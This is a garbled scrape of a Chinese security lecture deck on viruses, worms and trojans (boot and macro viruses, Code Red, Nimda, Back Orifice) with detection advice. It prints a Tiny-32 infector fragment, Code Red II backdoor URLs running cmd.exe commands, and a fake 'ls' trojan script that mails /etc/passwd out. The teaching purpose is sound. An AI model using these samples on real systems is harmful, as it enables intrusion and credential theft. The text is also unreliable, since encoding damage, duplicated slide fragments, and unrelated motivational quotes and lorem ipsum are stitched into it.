計(jì)算機(jī)病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義

《計(jì)算機(jī)病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義》由會(huì)員分享，可在線閱讀，更多相關(guān)《計(jì)算機(jī)病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義（46頁(yè)珍藏版）》請(qǐng)?jiān)谘b配圖網(wǎng)上搜索。

1、計(jì)算機(jī)病毒、蠕蟲和特洛伊木馬提綱1.計(jì)算機(jī)病毒2.網(wǎng)絡(luò)蠕蟲3.特洛伊木馬計(jì)算機(jī)病毒 病毒結(jié)構(gòu)模型 病毒的分類 引導(dǎo)型病毒 文件型病毒 宏病毒 病毒舉例 病毒防范計(jì)算機(jī)病毒的結(jié)構(gòu)傳染條件判斷傳染代碼表現(xiàn)及破壞條件判斷破壞代碼傳染模塊表現(xiàn)模塊計(jì)算機(jī)病毒的分類 按攻擊平臺(tái)分類：DOS,Win32，MAC，Unix 按危害分類：良性、惡性 按代碼形式：源碼、中間代碼、目標(biāo)碼 按宿主分類：引導(dǎo)型 主引導(dǎo)區(qū) 操作系統(tǒng)引導(dǎo)區(qū) 文件型 操作系統(tǒng) 應(yīng)用程序 宏病毒引導(dǎo)型病毒引導(dǎo)記錄 主引導(dǎo)記錄（MBR）55AA主引導(dǎo)程序(446字節(jié))分區(qū)1(16 字節(jié))主分區(qū)表(64字節(jié)）分區(qū)2(16 字節(jié))分區(qū)3(16 字節(jié)

2、)分區(qū)4(16 字節(jié))結(jié)束標(biāo)記（2字節(jié)）引導(dǎo)代碼及出錯(cuò)信息A引導(dǎo)型病毒系統(tǒng)引導(dǎo)過(guò)程Power OnCPU&ROM BIOS InitializesPOST TestsLook for boot deviceMBR bootPartition Table LoadDOS Boot Sector RunsLoads IO.SYSMSDOS.SYSDOS Loaded引導(dǎo)型病毒感染與執(zhí)行過(guò)程系統(tǒng)引導(dǎo)區(qū)引導(dǎo)正常執(zhí)行病毒病毒執(zhí)行病毒駐留帶毒執(zhí)行。病毒引導(dǎo)系統(tǒng)病毒體。病毒的激活過(guò)程空閑區(qū)。內(nèi)存空間int8int21int2Fint4A時(shí)鐘中斷處理DOS中斷處理外設(shè)處理中斷實(shí)時(shí)時(shí)種警報(bào)中斷空閑區(qū)帶病毒程序空

3、閑區(qū)空閑區(qū)正常程序病 毒int8int8。int8。int8int8int8int8int8int8int8int8int8int8。int8int8空閑區(qū)正常程序正常程序。正常程序正常程序正常程序int8是26日？是,破壞！int8舉例小球病毒（Bouncing Ball)在磁盤上的存儲(chǔ)位置文件分配表病毒的第二部分000號(hào)扇區(qū)001號(hào)扇區(qū)第一個(gè)空簇FF7正常的引導(dǎo)扇區(qū)正常的引導(dǎo)扇區(qū)病毒的第一部分感染后的系統(tǒng)啟動(dòng)過(guò)程啟動(dòng)將病毒程序的第一部分送入內(nèi)存高端將第二部分裝入內(nèi)存，與第一部分拼接在一起讀入真正的Boot 區(qū)代碼，送到0000:TC00處修改INT 13 中斷向量，指向病毒轉(zhuǎn)移到 0000

4、:TC00處，開始真正的系統(tǒng)引導(dǎo)觸發(fā)條件修改后的INT 13進(jìn)入INT 13中斷是否為讀盤？執(zhí)行正常的INT 13程序執(zhí)行正常的INT 13程序N所讀盤是否是自身？Y修改INT8 開始發(fā)作Y是否整點(diǎn)或半點(diǎn)Y執(zhí)行正常的INT 13程序Y是否帶病毒？N調(diào)用傳染過(guò)程感染磁盤N不發(fā)作執(zhí)行正常的INT 13程序N病毒檢測(cè)原理 特征匹配 例如，在香港病毒:1F 58 EA 1A AF 00 F0 9C:POP AXJMP F000 AF1APUSHF 行為監(jiān)控 對(duì)中斷向量表的修改 對(duì)引導(dǎo)記錄的修改 對(duì).exe,.com文件的寫操作 駐留內(nèi)存 軟件模擬防范與檢測(cè) 數(shù)據(jù)備份 不要用移動(dòng)介質(zhì)啟動(dòng)（設(shè)置CMOS選

5、項(xiàng)）設(shè)置CMOS的引導(dǎo)記錄保護(hù)選項(xiàng) 安裝補(bǔ)丁，并及時(shí)更新 安裝防病毒軟件，及時(shí)更新病毒定義碼 限制文件共享 不輕易打開電子郵件的附件 沒(méi)有病毒處理前不要使用其他移動(dòng)介質(zhì) 不要運(yùn)行不可信的程序 移動(dòng)介質(zhì)寫保護(hù)文件型病毒文件結(jié)構(gòu).COM文件.EXE 文件PSP Header(256 bytes)Code,Data,StackSegment(s)(64K Bytes)代碼、數(shù)據(jù)、堆棧在通一段中在內(nèi)存中的.COM是磁盤文件的鏡像 PSP Header(512 bytes)Code Segment(s)(64K)Data Segment(s)(64K)Stack Segment(s)(64K)其他可執(zhí)行

6、的文件類型.BAT.PIF.SYS.DRV.OVR.OVL.DLL.VxD正常正常程序程序正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭程序頭程序頭程序頭程序頭程

7、序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序正常正常程序程序程序頭程序頭文件型病毒感染機(jī)理文件型病毒舉例 最簡(jiǎn)單的病毒Tiny-32(32 bytes)尋找宿主文件 打開文件 把自己寫入文件 關(guān)閉文件MOV

8、AH,4E;setup to find a fileINT 21;find the host fileMOV AX,3D02;setup to open the host fileINT 21;open host fileMOV AH,40;setup to write file to diskINT 21;write to fileDB *.COM;what files to look for宏病毒（Macro Virus）歷史：1980年，Dr.Fredrick Cohen and Ralf Burger 論文 1994年，Microsoft Word 第一例宏病毒 Word,Excel,

9、Access,PowerPoint,Project,Lotus AmiPro,Visio,Lotus 1-2-3,AutoCAD,Corel Draw.使用數(shù)據(jù)文件進(jìn)行傳播，使得反病毒軟件不再只關(guān)注可執(zhí)行文件和引導(dǎo)區(qū) DOE ViRT 統(tǒng)計(jì)，85%的病毒感染歸因于宏病毒 易于編寫，只需要一兩天的時(shí)間，1015行代碼 大量的用戶：90 Million MS Office Users 人們通常不交換程序，而交換數(shù)據(jù)宏病毒工作機(jī)理有毒文件.docNormal.dot激活autoopen宏寫入無(wú)毒文件.docNormal.dot啟動(dòng)激活病毒注意事項(xiàng) Macro 可以存在模板里，也可以存在文檔里 RTF

10、文件也可以包含宏病毒 通過(guò)IE 瀏覽器可以直接打開，而不提示下載提綱1.計(jì)算機(jī)病毒2.網(wǎng)絡(luò)蠕蟲3.特洛伊木馬蠕蟲（Worm）一個(gè)獨(dú)立的計(jì)算機(jī)程序，不需要宿主 自我復(fù)制，自主傳播（Mobile）占用系統(tǒng)或網(wǎng)絡(luò)資源、破壞其他程序 不偽裝成其他程序，靠自主傳播 利用系統(tǒng)漏洞；利用電子郵件（無(wú)需用戶參與）莫里斯蠕蟲事件 發(fā)生于1988年，當(dāng)時(shí)導(dǎo)致大約6000臺(tái)機(jī)器癱瘓 主要的攻擊方法 Rsh，rexec：用戶的缺省認(rèn)證 Sendmail 的debug模式 Fingerd的緩沖區(qū)溢出 口令猜測(cè)CR I 主要影響Windows NT系統(tǒng)和Windows 2000主要影響國(guó)外網(wǎng)絡(luò)據(jù)CERT統(tǒng)計(jì)，至8月初已經(jīng)

11、感染超過(guò)25萬(wàn)臺(tái) 主要行為利用IIS 的Index服務(wù)的緩沖區(qū)溢出缺陷進(jìn)入系統(tǒng)檢查c:notworm文件是否存在以判斷是否感染中 文 保 護(hù)（是 中 文windows就不修改主頁(yè)）攻擊白宮！CR II Inspired by RC I 影響波及全球 國(guó)內(nèi)影響尤其廣泛 主要行為 所利用缺陷相同 只感染windows2000系統(tǒng)，由于一些參數(shù)的問(wèn)題，只會(huì)導(dǎo)致NT死機(jī) 休眠與掃描：中文windows，600個(gè)線程N(yùn)imda 簡(jiǎn)介 影響系統(tǒng)：MS win9x,wind2k,win XP 傳播途徑：Email、文件共享、頁(yè)面瀏覽、MS IIS目錄遍歷、Code Red 后門 影響 群發(fā)電子郵件，付病毒

12、掃描共享文件夾，掃描有漏洞的IIS,掃描有Code Red后門的IIS Server紅色代碼病毒 紅色代碼病毒是一種結(jié)合了病毒、木馬、DDOS機(jī)制的蠕蟲。2001年7月中旬，在美國(guó)等地大規(guī)模蔓延。2001年8月初，出現(xiàn)變種coderedII，針對(duì)中文版windows系統(tǒng)，國(guó)內(nèi)大規(guī)模蔓延。通過(guò)80端口傳播。只存在與網(wǎng)絡(luò)服務(wù)器的內(nèi)存，不通過(guò)文件載體。利用IIS緩沖區(qū)溢出漏洞（2001年6月18日發(fā)布）CodeRed ICodeRed II增加了特洛依木馬的功能，并針對(duì)中國(guó)網(wǎng)站做了改進(jìn)1.計(jì)算IP的方法進(jìn)行了修改，使病毒傳染的更快；2.檢查是否存在CodeRedII原子，若存在則進(jìn)入睡眠狀態(tài)防止反復(fù)

13、感染，若不存在則創(chuàng)建CodeRedII原子；3.創(chuàng)建300個(gè)線程進(jìn)行傳染，若系統(tǒng)默認(rèn)語(yǔ)言為簡(jiǎn)體中文或繁體中文，則創(chuàng)建600個(gè)線程；4.檢查時(shí)間。病毒作者的意圖是傳播過(guò)程在2001年10月1日完成，之后，蠕蟲會(huì)爆發(fā)而使系統(tǒng)不斷重新啟動(dòng)。5.在系統(tǒng)中安裝一個(gè)特洛依木馬：拷貝系統(tǒng)目錄cmd.exe到IIS的腳本執(zhí)行目錄下，改名為root.exe；將病毒體內(nèi)的木馬解壓縮寫到C盤和D盤的explorer.exe木馬每次系統(tǒng)和啟動(dòng)都會(huì)運(yùn)行，禁止系統(tǒng)的文件保護(hù)功能，并將C盤和D盤通過(guò)web服務(wù)器共享CodeRed II 攻擊形式http:/x.x.x.x/c/inetpub/scripts/root.exe

14、?/c+dirhttp:/x.x.x.x/c/winnt/system32/cmd.exe?/c+dir 其中x.x.x.x是被攻擊的IP地址，dir可以是任意命令，比如刪除系統(tǒng)中的文件，向外發(fā)送機(jī)密數(shù)據(jù)等，這個(gè)后門后來(lái)也成為了nimda病毒的一個(gè)傳播模式。下面是cert/cc上提供的被攻擊服務(wù)器日志(CA-2001-11)2001-05-06 12:20:19 10.10.10.10-10.20.20.20 80 GET/scripts/././winnt/system32/cmd.exe/c+dir 200 2001-05-06 12:20:19 10.10.10.10-10.20.20.

15、20 80 GET/scripts/././winnt/system32/cmd.exe/c+dir+.200 紅色代碼病毒的檢測(cè)和防范 針對(duì)安裝IIS的windows系統(tǒng)；是否出現(xiàn)負(fù)載顯著增加（CPU/網(wǎng)絡(luò)）的現(xiàn)象；用netstat an檢查是否有許多對(duì)外的80端口連接 在web日志中檢查是否有/default.ida?xxx.%u0078%u0000 u00=a HTTP/1.0這樣的攻擊記錄；查找系統(tǒng)中是否存在文件c:explorer.exe或d:explorer.exe以及root.exe；檢查注冊(cè)表文件中是否增加了C和D虛擬目錄，以及文件保護(hù)功能是否被禁止。在任務(wù)管理器中檢查是否存在

16、兩個(gè)explorer.exe進(jìn)程。提綱1.計(jì)算機(jī)病毒2.網(wǎng)絡(luò)蠕蟲3.特洛伊木馬特洛伊木馬 名字來(lái)源：古希臘故事 通過(guò)偽裝成其他程序、有意隱藏自己惡意行為的程序，通常留下一個(gè)遠(yuǎn)程控制的后門 沒(méi)有自我復(fù)制的功能 非自主傳播 用戶主動(dòng)發(fā)送給其他人 放到網(wǎng)站上由用戶下載最簡(jiǎn)單的木馬舉例ls#!/bin/sh/bin/mail /etc/passwdlsPATH=./:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin特洛依木馬舉例 Back Orifice Cult of the Dead Cow在1998年8月發(fā)布,公開源碼軟件，遵守GPL，是功能

17、強(qiáng)大的遠(yuǎn)程控制器木馬。boserver.exe、boconfig.exe、bogui.exe 在BO服務(wù)器上啟動(dòng)、停止基于文本的應(yīng)用程序 目錄和文件操作。包括創(chuàng)建、刪除、查看目錄、查找、解壓、壓縮。共享。創(chuàng)建共享資源 HTTP服務(wù)。啟動(dòng)或停止HTTP服務(wù)。擊鍵記錄。將BO服務(wù)器上用戶的擊鍵記錄在一個(gè)文本文件中，同時(shí)記錄執(zhí)行輸入的窗口名。（可以獲得用戶口令）特洛依木馬 視頻輸入、播放。捕捉服務(wù)器屏幕到一個(gè)位圖文件中。網(wǎng)絡(luò)連接。列出和斷開BO服務(wù)器上接入和接出的連接，可以發(fā)起新連接。查看信息。查看所有網(wǎng)絡(luò)端口、域名、服務(wù)器和可見的共享“出口”。返回系統(tǒng)信息，包括機(jī)器名、當(dāng)前用戶、CPU類型、內(nèi)存容

18、量及可用內(nèi)存、Windows版本、驅(qū)動(dòng)器類型、硬盤容量及使用空間。端口重定向。注冊(cè)表 鎖住或重啟計(jì)算機(jī)。傳輸文件特洛依木馬 使用netstat a 檢查是否還有未知端口監(jiān)聽(默認(rèn)31337)檢測(cè)和刪除 注冊(cè)表HLMsoftwaremicrosoftwindowscurrentVersionrunservices鍵值，是否有“Name Data.exe”，若有則刪除 C:windowssystem目錄：刪除“.exe”文件和windll.dll文件特洛依木馬 其他木馬 國(guó)外subsever、dagger、ACKcmdC、DeepThroat、SatansBackdoor 等 國(guó)內(nèi)（更常見）冰河、

19、廣外女生、netspy、黑洞等刪除木馬的通用方法Win.ini文件windows節(jié)中run=和loadsystem.ini文件boot節(jié)的shell=explorer.exeAutoexec.bat文件win命令注冊(cè)表HLMsoftwaremicrosoftwindowscurrentversionrunHCUsoftwaremicrosoftwindowscurrentversionrunonceHCRexefileshellopencommand“%1”%*HCUcontrol paneldesktopwallpaper更高級(jí)的木馬技術(shù) 服務(wù)器端程序文件的隱藏 問(wèn)題：磁盤上的文件、系統(tǒng)中的

20、進(jìn)程 木馬：DLL 陷阱 防范：DLL 簽名技術(shù) 隱藏端口監(jiān)聽 寄生：選擇一個(gè)已經(jīng)打開的端口，如80 潛伏：不使用TCP/UDP,使用ICMP 突破防火墻的限制 反彈端口型木馬：突破防火墻的限制:反彈端口型木馬Web Server病毒、蠕蟲與木馬的比較特性病毒蠕蟲木馬宿主需要不需要需要表現(xiàn)形式不以文件形式存在獨(dú)立的文件偽裝成其他文件傳播方式依賴宿主文件或介質(zhì)自主傳播依靠用戶主動(dòng)傳播主要危害破壞數(shù)據(jù)完整性、系統(tǒng)完整性侵占資源留下后門，竊取信息傳播速度快極快慢提綱1.網(wǎng)絡(luò)攻擊方法竊聽口令破解端口掃描和信息收集緩沖區(qū)溢出漏洞掃描拒絕服務(wù)2.惡意移動(dòng)代碼計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬其他惡意代碼9、靜夜

21、四無(wú)鄰，荒居舊業(yè)貧。22.8.1122.8.11Thursday,August 11,202210、雨中黃葉樹，燈下白頭人。20:32:1320:32:1320:328/11/2022 8:32:13 PM11、以我獨(dú)沈久，愧君相見頻。22.8.1120:32:1320:32Aug-2211-Aug-2212、故人江海別，幾度隔山川。20:32:1320:32:1320:32Thursday,August 11,202213、乍見翻疑夢(mèng)，相悲各問(wèn)年。22.8.1122.8.1120:32:1320:32:13August 11,202214、他鄉(xiāng)生白發(fā)，舊國(guó)見青山。2022年8月11日星期四下

22、午8時(shí)32分13秒20:32:1322.8.1115、比不了得就不比，得不到的就不要。2022年8月下午8時(shí)32分22.8.1120:32August 11,202216、行動(dòng)出成果，工作出財(cái)富。2022年8月11日星期四20時(shí)32分13秒20:32:1311 August 202217、做前，能夠環(huán)視四周；做時(shí)，你只能或者最好沿著以腳為起點(diǎn)的射線向前。下午8時(shí)32分13秒下午8時(shí)32分20:32:1322.8.119、沒(méi)有失敗，只有暫時(shí)停止成功！。22.8.1122.8.11Thursday,August 11,202210、很多事情努力了未必有結(jié)果，但是不努力卻什么改變也沒(méi)有。20:32:

23、1320:32:1320:328/11/2022 8:32:13 PM11、成功就是日復(fù)一日那一點(diǎn)點(diǎn)小小努力的積累。22.8.1120:32:1320:32Aug-2211-Aug-2212、世間成事，不求其絕對(duì)圓滿，留一份不足，可得無(wú)限完美。20:32:1320:32:1320:32Thursday,August 11,202213、不知香積寺，數(shù)里入云峰。22.8.1122.8.1120:32:1320:32:13August 11,202214、意志堅(jiān)強(qiáng)的人能把世界放在手中像泥塊一樣任意揉捏。2022年8月11日星期四下午8時(shí)32分13秒20:32:1322.8.1115、楚塞三湘接，荊

24、門九派通。2022年8月下午8時(shí)32分22.8.1120:32August 11,202216、少年十五二十時(shí)，步行奪得胡馬騎。2022年8月11日星期四20時(shí)32分13秒20:32:1311 August 202217、空山新雨后，天氣晚來(lái)秋。下午8時(shí)32分13秒下午8時(shí)32分20:32:1322.8.119、楊柳散和風(fēng)，青山澹吾慮。22.8.1122.8.11Thursday,August 11,202210、閱讀一切好書如同和過(guò)去最杰出的人談話。20:32:1320:32:1320:328/11/2022 8:32:13 PM11、越是沒(méi)有本領(lǐng)的就越加自命不凡。22.8.1120:32:

25、1320:32Aug-2211-Aug-2212、越是無(wú)能的人，越喜歡挑剔別人的錯(cuò)兒。20:32:1320:32:1320:32Thursday,August 11,202213、知人者智，自知者明。勝人者有力，自勝者強(qiáng)。22.8.1122.8.1120:32:1320:32:13August 11,202214、意志堅(jiān)強(qiáng)的人能把世界放在手中像泥塊一樣任意揉捏。2022年8月11日星期四下午8時(shí)32分13秒20:32:1322.8.1115、最具挑戰(zhàn)性的挑戰(zhàn)莫過(guò)于提升自我。2022年8月下午8時(shí)32分22.8.1120:32August 11,202216、業(yè)余生活要有意義，不要越軌。2022年8月11日星期四20時(shí)32分13秒20:32:1311 August 202217、一個(gè)人即使已登上頂峰，也仍要自強(qiáng)不息。下午8時(shí)32分13秒下午8時(shí)32分20:32:1322.8.11MOMODA POWERPOINTLorem ipsum dolor sit amet,consectetur adipiscing elit.Fusce id urna blandit,eleifend nulla ac,fringilla purus.Nulla iaculis tempor felis ut cursus.感 謝 您 的 下 載 觀 看感 謝 您 的 下 載 觀 看專家告訴